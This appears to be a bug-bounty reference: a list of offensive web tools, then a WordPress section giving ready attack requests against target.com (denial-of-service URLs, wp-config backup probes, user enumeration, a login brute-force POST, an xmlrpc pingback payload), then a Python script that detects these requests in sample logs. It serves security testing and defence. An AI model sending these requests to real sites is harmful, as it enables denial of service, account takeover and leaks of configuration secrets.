Web Technologies
Adobe AEM
aem-hacker - Tools to identify vulnerable Adobe Experience Manager (AEM) webapps.
aemscan - Adobe Experience Manager Vulnerability Scanner
Apache Web Server
apache-users - This Perl script will enumerate the usernames on any system that uses Apache with the UserDir module.
APIs
https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d - API Endpoint wordlist
imperva/automatic-api-attack-tool - Imperva's customizable API attack tool takes an API specification as an input, generates and runs attacks that are based on it as an output.
Astra - Automated Security Testing For REST APIs
OWASP API check - APICheck is an environment for integrating existing HTTP API tools and creating execution chains easily.
VX-API - Collection of various WINAPI tricks / features used or abused by Malware
https://malapi.io/ - Cheatsheet for commands that could be potentially used for malicious activity.
crAPI - completely ridiculous API (crAPI) will help you to understand the ten most critical API security risks. crAPI is vulnerable by design, but you'll be able to safely run it to educate/train yourself.
https://github.com/Net-hunter121/API-Wordlist - A wordlist of API names used for fuzzing web application APIs.
https://github.com/metlo-labs/metlo - Metlo is an open-source API security platform
Hacking: The next generation - Application Protocol Handlers, pg. 96
For training on APIs and API hacking, please see https://github.com/jassics/security-study-plan/blob/main/api-security-study-plan.md
API: GraphQL
InQL - A Burp Extension for GraphQL Security Testing
ASP.NET
viewgen - a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys
Cloudflare
cloudflare_enum - Cloudflare DNS Enumeration Tool for Pentesters
Firebase
Insecure-Firebase-Exploit - A simple Python exploit to write data to insecure/vulnerable Firebase databases, commonly found inside mobile apps. If the owner of the app has set the security rules to true for both "read" and "write", an attacker can probably dump the database and write their own data to the Firebase DB.
Firebase-Extractor - A tool written in python for scraping firebase data
Pyrebase - A simple python wrapper for the Firebase API.
Flask
Flask-Unsign - Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
Google Web Toolkit
GWTMap - GWTMap is a tool to help map the attack surface of Google Web Toolkit (GWT) based applications.
.htaccess File
htshells - htshells is a series of web-based attacks built around .htaccess files. Most of the attacks fall into two categories: remote code/command execution and information disclosure.
JavaScript
JSScanner - Scan JS Files for Endpoints and Secrets
JSFScan.sh - Automation for JavaScript recon in bug bounty.
jshole - A JavaScript components vulnerability scanner, based on RetireJS
Retire.JS - Burp/ZAP/Maven extension that integrates the Retire.js repository to find vulnerable JavaScript libraries.
JSshell - JavaScript reverse/remote shell from XSS
unmap - Unpack a JavaScript Source Map back into filesystem structure
JSA - JavaScript security analysis (JSA) is a program for JavaScript analysis during web application security assessments.
JBoss
jboss-autopwn - This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.
jexboss - JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
Jenkins
pwn_jenkins - Notes about attacking Jenkins servers
Accenture/jenkins-attack-framework - Project for enumerating and attacking Jenkins
Jira
jira_scan - A simple remote scanner for Atlassian Jira
Joomla
JCS - JCS (Joomla Component Scanner) made for penetration testing purposes on Joomla CMS
Joomscan - OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments.
juumla - Juumla is a python tool created to identify Joomla version, scan for vulnerabilities and search for config files.
Magento
magescan - Scan a Magento site for information
NGINX
nginxpwner - Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities.
OneLogin - SAML
SAMLExtractor - A tool that takes a URL or a list of URLs and prints back the SAML consume URL.
OWA/O365
MailSniper - MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an administrator to search the mailboxes of every user in a domain.
byt3bl33d3r/SprayingToolkit - Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient
o365enum - Enumerate valid usernames from Office 365 using ActiveSync, Autodiscover v1, or office.com login page.
o365-attack-toolkit - o365-attack-toolkit allows operators to perform oauth phishing attacks.
http://www.blackhillsinfosec.com/?p=4694 - UserName Recon/Password Spraying
http://www.blackhillsinfosec.com/?p=5089 - Password Spraying MFA/2FA
http://www.blackhillsinfosec.com/?p=5330 - Password Spraying/GlobalAddressList
http://www.blackhillsinfosec.com/?p=5396 - Outlook 2FA Bypass
https://silentbreaksecurity.com/malicious-outlook-rules/ - Malicious Outlook Rules
http://www.blackhillsinfosec.com/?p=5465 - Outlook Rules in Action
Ruby on Rails
brakeman - A static analysis security vulnerability scanner for Ruby on Rails applications
SAP
SAP_RECON - PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)
Virtual Hosts
virtual-host-discovery - A script to enumerate virtual hosts on a server.
vhosts-sieve - Searching for virtual hosts among non-resolvable domains
VHostScan - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detects catch-all scenarios, and works around wildcards, aliases and dynamic default pages.
Web Proxies
https://github.com/GrrrDog/weird_proxies - Reverse proxies cheatsheet
WordPress - Resources
WPScan - The WordPress Vulnerability Scanner
https://wpsec.com/ - Online WordPress scanner
Wordpress Exploit Framework - A Ruby framework designed to aid in the penetration testing of WordPress systems.
WPSploit - This repository is designed for creating and/or porting of specific exploits for WordPress using metasploit as exploitation tool.
xmlrpc-scan - Scan a list of URLs or a single URL for WordPress XML-RPC issues.
wpxploit - Simple Python script for performing an XML-RPC dictionary attack
plecost - WordPress fingerprinting tool; plecost searches for and retrieves information about the plugin versions installed on WordPress systems.
WordPress Common Bugs
Denial of Service via load-scripts.php
http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter
Denial of Service via load-styles.php
http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic
Log files exposed
http://target.com/wp-content/debug.log
Backup file wp-config exposed
.wp-config.php.swp
wp-config.inc
wp-config.old
wp-config.txt
wp-config.html
wp-config.php.bak
wp-config.php.dist
wp-config.php.inc
wp-config.php.old
wp-config.php.save
wp-config.php.swp
wp-config.php.txt
wp-config.php.zip
wp-config.php.html
wp-config.php~
Information disclosure: WordPress username
http://target.com/?author=1
http://target.com/wp-json/wp/v2/users
http://target.com/?rest_route=/wp/v2/users
Brute force against wp-login.php
POST /wp-login.php HTTP/1.1
Host: target.com
log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
XSPA in WordPress
POST /xmlrpc.php HTTP/1.1
Host: target.com
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://yourip:port</string></value>
</param><param>
<value>
<string>https://target.com/</string>
</value>
</param></params>
</methodCall>
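Detection logic for the request patterns listed in this WordPress section, as an added example that is not part of the original page or of the linked AllAboutBugBounty repository. It runs over constructed Apache combined-format access log lines (not real traffic) and flags oversized load-scripts.php/load-styles.php requests, debug.log and wp-config backup probes, author/REST user enumeration, bursts of POSTs to wp-login.php, and POSTs to xmlrpc.php; the thresholds (20 script handles, 5 login POSTs per source) are assumptions to tune per site.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,jquery,jquery-ui-core,jquery-ui-dialog,jquery-ui-tabs,jquery-effects-core,jquery-form,underscore,backbone,wp-util,wp-backbone,mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,code-editor HTTP/1.1" 200 512000 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /wp-content/debug.log HTTP/1.1" 200 4096 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /wp-config.php.bak HTTP/1.1" 404 0 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /?rest_route=/wp/v2/users HTTP/1.1" 200 890 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "POST /wp-login.php HTTP/1.1" 200 3400 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "POST /wp-login.php HTTP/1.1" 200 3400 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:42 +0000] "POST /wp-login.php HTTP/1.1" 200 3400 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:42 +0000] "POST /wp-login.php HTTP/1.1" 200 3400 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:43 +0000] "POST /wp-login.php HTTP/1.1" 200 3400 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:45 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "python-requests/2.31"
198.51.100.7 - - [10/Oct/2023:13:56:00 +0000] "GET /wp-admin/load-scripts.php?load=jquery-core,jquery-migrate HTTP/1.1" 200 90000 "https://example.test/wp-admin/" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-login.php HTTP/1.1" 200 3400 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Assumed thresholds; a legitimate admin page loads a handful of handles, the
# DoS request on this page lists hundreds.
LOAD_HANDLE_THRESHOLD = 20
LOGIN_POST_THRESHOLD = 5

# Backup/leftover names of wp-config listed on this page.
WP_CONFIG_BACKUPS = {
    ".wp-config.php.swp", "wp-config.inc", "wp-config.old", "wp-config.txt",
    "wp-config.html", "wp-config.php.bak", "wp-config.php.dist",
    "wp-config.php.inc", "wp-config.php.old", "wp-config.php.save",
    "wp-config.php.swp", "wp-config.php.txt", "wp-config.php.zip",
    "wp-config.php.html", "wp-config.php~",
}


def classify(method, target):
    """Return the signature tags matched by a single request line."""
    parts = urlsplit(target)
    path, qs = parts.path, parse_qs(parts.query)
    tags = []
    if path in ("/wp-admin/load-scripts.php", "/wp-admin/load-styles.php"):
        handles = [h for h in qs.get("load", [""])[0].split(",") if h]
        if len(handles) >= LOAD_HANDLE_THRESHOLD:
            tags.append("load-php-dos")
    if path == "/wp-content/debug.log":
        tags.append("debug-log-probe")
    if path.rsplit("/", 1)[-1] in WP_CONFIG_BACKUPS:
        tags.append("wp-config-backup-probe")
    if ("author" in qs or path == "/wp-json/wp/v2/users"
            or qs.get("rest_route") == ["/wp/v2/users"]):
        tags.append("user-enumeration")
    if method == "POST" and path == "/xmlrpc.php":
        # The pingback body is not in the access log; a POST here is only a
        # candidate, to be confirmed against the request body or WAF logs.
        tags.append("xmlrpc-post")
    return tags


def scan_access_log(text, login_threshold=LOGIN_POST_THRESHOLD):
    """Return (ip, tag, detail) findings for every matched signature."""
    findings = []
    login_posts = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, _ts, method, target, _status, _size = m.groups()
        for tag in classify(method, target):
            findings.append((ip, tag, target))
        if method == "POST" and urlsplit(target).path == "/wp-login.php":
            login_posts[ip] += 1
    # Volume-based rule: repeated login POSTs from one source.
    for ip, n in login_posts.items():
        if n >= login_threshold:
            findings.append((ip, "wp-login-bruteforce", f"{n} POST /wp-login.php"))
    return findings


if __name__ == "__main__":
    for ip, tag, detail in scan_access_log(SAMPLE_LOG):
        print(f"{ip:<14} {tag:<24} {detail[:60]}")
```

The per-request rules are cheap enough to run in a log pipeline or as a WAF/fail2ban pattern; the login rule needs state per source, so in production it should be applied over a sliding time window rather than the whole file as done here.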
Source: https://github.com/daffainfo/AllAboutBugBounty/blob/master/CMS/WordPress.md